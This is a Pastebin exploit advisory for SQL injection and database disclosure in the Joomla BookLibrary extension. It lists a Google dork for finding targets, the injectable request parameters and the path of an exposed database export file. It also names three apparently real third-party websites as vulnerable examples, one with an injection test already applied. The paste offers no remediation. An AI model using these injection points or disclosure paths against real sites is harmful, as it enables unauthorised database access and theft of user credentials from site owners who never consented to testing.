Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla BookLibrary 4.0.31 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 12/02/2019
- # Vendor Homepage : ordasoft.com
- # Software Download Link : ordasoft.com/book-library-joomla-ebook-extension
- github.com/latinproject/bibliotecalatin/blob/master/administrator/components/com_booklibrary/
- # Software Information Link : extensions.joomla.org/extension/booklibrary-basic/
- # Software Version : 3.0 and 4.0.31 and other previous versions.
- # Software Prices : Free - Pro 40$ - PRO Shop Package 55$ - Developer Membership 259$
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_booklibrary''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-200 [ Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- BookLibrary is a powerful book extension. Book component provides a
- full-featured book library or book collection management environment on a Joomla-based
- website. Book manager allows you to manage large book libraries.
- Library manager can also be used to easily set up a book selling shop using
- Amazon if you want. With an Amazon Associates ID (as an Amazon affiliate)
- you can earn credits with book sales through Amazon, while Amazon
- takes care of the handling and shipping.
- ####################################################################
- # Impact :
- ***********
- * Joomla BookLibrary 4.0.31 and other versions -
- component for Joomla is prone to an SQL-injection vulnerability because it
- fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * This Software prone to an information exposure/database disclosure vulnerability.
- Successful exploits of this issue may allow an attacker to obtain sensitive
- information by downloading the full contents of the application's database.
- * Any remote user may download the database files and gain access
- to sensitive information including unencrypted authentication credentials.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_booklibrary&task=showCategory&catid=[SQL Injection]
- /index.php?option=com_booklibrary&task=showCategory&catid=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_booklibrary&task=showCategory&catid=[ID-NUMBER]&limitstart=[ID-NUMBER]&sortup=title&Itemid=[SQL Injection]
- # Database Disclosure Exploit :
- ****************************
- /administrator/components/com_booklibrary/exports/sample_data.dat
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] arcoeste.it/portale/index.php?option=com_booklibrary&task=
- showCategory&catid=130&limitstart=2130&sortup=title&Itemid=106%27
- [+] imagobiblioteca.it/index.php?option=com_booklibrary
- &task=showCategory&catid=35&Itemid=144%27
- [+] nybv.us/jl/administrator/components/com_booklibrary/exports/sample_data.dat
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Strict Standards: Non-static method JLoader::import() should not be
- called statically in /web/htdocs/www.arcoeste.it/home/portale
- /libraries/joomla/import.php on line 29
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment